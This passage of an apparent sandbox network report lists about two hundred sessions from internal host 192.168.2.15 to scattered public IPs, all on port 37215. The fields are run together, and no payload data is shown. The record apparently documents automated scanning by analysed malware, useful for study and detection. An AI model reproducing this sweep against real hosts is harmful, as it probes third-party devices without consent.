                                              28654192.168.2.1556214199.4.27.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28655192.168.2.154903641.130.82.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28656192.168.2.1556304157.164.70.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28657192.168.2.155459876.177.110.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28658192.168.2.1549632181.225.152.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28659192.168.2.153694294.68.201.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28660192.168.2.1540048197.173.59.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28661192.168.2.1554402190.113.80.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28662192.168.2.1536024121.111.62.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28663192.168.2.156088845.225.66.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28664192.168.2.1543246186.129.211.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28665192.168.2.1555288121.132.97.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28666192.168.2.155125031.16.199.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28667192.168.2.1553008186.152.180.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28668192.168.2.1540608102.86.232.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28669192.168.2.1553286122.194.243.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28670192.168.2.1556042121.224.183.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28671192.168.2.155945431.36.133.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28672192.168.2.1558324122.214.2.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28673192.168.2.1554154131.207.172.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28674192.168.2.1553198156.21.246.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28675192.168.2.154792094.243.89.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28676192.168.2.155457641.215.97.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28677192.168.2.1534100138.28.201.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28678192.168.2.155259431.50.38.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28679192.168.2.1545044138.86.53.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28680192.168.2.1546442138.244.24.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28681192.168.2.153818437.209.9.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28682192.168.2.155884031.6.113.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28683192.168.2.1540666190.9.106.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28684192.168.2.154305097.161.46.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28685192.168.2.1552462190.37.26.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28686192.168.2.1555720186.14.189.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28687192.168.2.1559130190.80.96.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28688192.168.2.1544606197.245.178.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28689192.168.2.1536594197.164.78.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28690192.168.2.154234094.130.95.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28691192.168.2.1541676122.4.218.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28692192.168.2.1541452197.187.169.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28693192.168.2.155669094.57.22.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28694192.168.2.1544686197.123.116.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28695192.168.2.155205841.247.154.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28696192.168.2.155963637.176.160.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28697192.168.2.1553576190.146.188.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28698192.168.2.1544616222.140.159.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28699192.168.2.155384694.93.7.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28700192.168.2.1559486156.67.144.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28701192.168.2.1549330121.194.208.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28702192.168.2.1547150138.40.25.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28703192.168.2.1558332157.206.127.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28704192.168.2.1558214156.10.204.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28705192.168.2.1559490157.126.80.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28706192.168.2.155288441.239.211.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28707192.168.2.1558734157.216.93.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28708192.168.2.1551568197.10.211.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28709192.168.2.156074435.138.218.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28710192.168.2.1534082210.27.56.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28711192.168.2.153309294.232.68.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28712192.168.2.154166237.190.31.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28713192.168.2.1555420181.28.130.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28714192.168.2.1546392122.39.60.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28715192.168.2.154739645.220.178.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28716192.168.2.1533814197.137.130.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28717192.168.2.153425459.237.113.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28718192.168.2.1550390122.229.170.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28719192.168.2.1535448102.249.179.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28720192.168.2.1537934222.79.158.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28721192.168.2.1545104122.99.33.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28722192.168.2.1557880102.34.98.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28723192.168.2.156036494.234.14.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28724192.168.2.1549558156.146.206.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28725192.168.2.1553658157.207.212.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28726192.168.2.1551144222.81.181.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28727192.168.2.153543031.134.16.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28728192.168.2.1560384186.100.167.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28729192.168.2.1557118122.49.88.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28730192.168.2.1537928156.130.143.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28731192.168.2.153348237.24.5.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28732192.168.2.155750694.238.63.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28733192.168.2.1545814157.80.113.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28734192.168.2.1535682102.62.34.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28735192.168.2.155418060.44.27.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28736192.168.2.1550814121.255.238.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28737192.168.2.1542592156.179.31.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28738192.168.2.1543522222.240.253.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28739192.168.2.1535716151.99.30.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28740192.168.2.1540844157.35.134.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28741192.168.2.1559510181.147.130.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28742192.168.2.1540874186.229.93.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28743192.168.2.1555238186.107.138.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28744192.168.2.153625894.249.148.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28745192.168.2.1555514157.65.32.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28746192.168.2.1549566190.138.148.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28747192.168.2.1538392138.163.230.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28748192.168.2.155142294.234.227.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28749192.168.2.1559506156.106.99.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28750192.168.2.1555106197.206.57.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28751192.168.2.1544018156.24.143.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28752192.168.2.155537441.118.78.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28753192.168.2.1541412122.140.89.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28754192.168.2.1560156138.1.189.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28755192.168.2.1533254138.66.205.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28756192.168.2.1540670122.184.177.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28757192.168.2.153385431.123.51.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28758192.168.2.153632294.137.3.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28759192.168.2.153626494.97.253.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28760192.168.2.155513041.170.143.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28761192.168.2.1535752190.136.44.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28762192.168.2.1551514190.45.218.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28763192.168.2.1547008102.179.236.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28764192.168.2.1546762186.106.148.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28765192.168.2.1553538181.125.248.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28766192.168.2.154528645.133.57.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28767192.168.2.154996641.153.117.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28768192.168.2.1535894190.85.83.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28769192.168.2.154118694.120.121.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28770192.168.2.1539586190.234.66.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28771192.168.2.154211645.37.65.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28772192.168.2.1547086172.79.35.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28773192.168.2.1556842186.103.197.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28774192.168.2.1552634156.221.131.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28775192.168.2.155653437.6.204.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28776192.168.2.1547886156.112.225.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28777192.168.2.1538610122.204.58.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28778192.168.2.1554748190.17.5.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28779192.168.2.154302694.82.98.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28780192.168.2.1560130181.249.233.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28781192.168.2.1553978102.146.77.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28782192.168.2.153485645.113.223.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28783192.168.2.1533432181.216.184.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28784192.168.2.153897437.142.19.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28785192.168.2.154576431.57.62.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28786192.168.2.154392652.211.186.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28787192.168.2.1545106222.132.66.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28788192.168.2.1537502222.209.100.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28789192.168.2.1537518157.94.54.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28790192.168.2.1545528190.56.194.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28791192.168.2.154701623.203.174.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28792192.168.2.1532808181.29.24.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28793192.168.2.1555444186.98.180.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28794192.168.2.1549938130.97.70.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28795192.168.2.1540060186.62.229.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28796192.168.2.1560564157.212.130.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28797192.168.2.1541000138.94.242.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28798192.168.2.153635637.245.67.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28799192.168.2.1558660102.203.47.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28800192.168.2.1538398102.40.53.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28801192.168.2.153408431.52.167.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28802192.168.2.1534666102.224.225.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28803192.168.2.1539508197.220.53.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28804192.168.2.153375096.65.18.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28805192.168.2.1558484122.77.127.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28806192.168.2.1556164186.161.226.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28807192.168.2.153307245.6.203.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28808192.168.2.155469241.144.120.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28809192.168.2.1560766122.241.189.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28810192.168.2.1547644138.111.40.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28811192.168.2.153540431.130.82.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28812192.168.2.1539176157.169.196.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28813192.168.2.1554476156.94.164.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28814192.168.2.154495494.193.37.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28815192.168.2.1538938222.235.175.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28816192.168.2.155332645.238.109.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28817192.168.2.1555558222.239.43.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28818192.168.2.155281845.168.236.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28819192.168.2.1540834157.171.206.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28820192.168.2.154251041.224.139.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28821192.168.2.154524039.20.123.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28822192.168.2.153698694.130.26.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28823192.168.2.1549528156.142.88.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28824192.168.2.154304694.161.17.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28825192.168.2.1558774157.110.35.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28826192.168.2.1537726122.82.42.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28827192.168.2.1538228157.204.26.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28828192.168.2.1557276103.52.132.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28829192.168.2.153876237.50.22.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28830192.168.2.153980441.66.90.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28831192.168.2.1549484122.100.127.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28832192.168.2.1552126222.80.247.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28833192.168.2.154991094.211.149.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28834192.168.2.154343041.160.128.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28835192.168.2.1545316222.96.59.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28836192.168.2.1534970122.229.54.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28837192.168.2.1549506181.244.160.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28838192.168.2.1536872157.201.96.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28839192.168.2.156094431.135.101.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28840192.168.2.1560656138.166.134.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28841192.168.2.1541090121.82.128.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28842192.168.2.156053631.241.15.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28843192.168.2.1553800197.29.161.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28844192.168.2.155781441.247.183.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28845192.168.2.1535016157.188.3.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28846192.168.2.154563437.79.23.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28847192.168.2.1548374138.51.9.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28848192.168.2.1555024138.34.12.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28849192.168.2.1539584102.108.19.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28850192.168.2.153389041.185.181.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28851192.168.2.155003237.110.132.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28852192.168.2.153629045.158.158.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28853192.168.2.155065831.102.31.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28854192.168.2.1548918138.63.33.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28855192.168.2.1539504121.28.215.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28856192.168.2.155175037.202.162.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28857192.168.2.1552004102.57.62.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28858192.168.2.1543126121.242.138.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28859192.168.2.1549108121.245.237.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28860192.168.2.155371041.155.39.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28861192.168.2.153720445.135.254.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28862192.168.2.1543410197.152.39.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28863192.168.2.1559890190.120.126.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28864192.168.2.1551126190.176.189.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28865192.168.2.1539570186.114.51.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28866192.168.2.1536740138.76.210.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28867192.168.2.1548490197.149.110.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28868192.168.2.1559368122.155.181.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28869192.168.2.1558756102.97.198.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28870192.168.2.1556222102.34.205.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28871192.168.2.1552658222.203.249.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28872192.168.2.1556902156.95.64.18837215
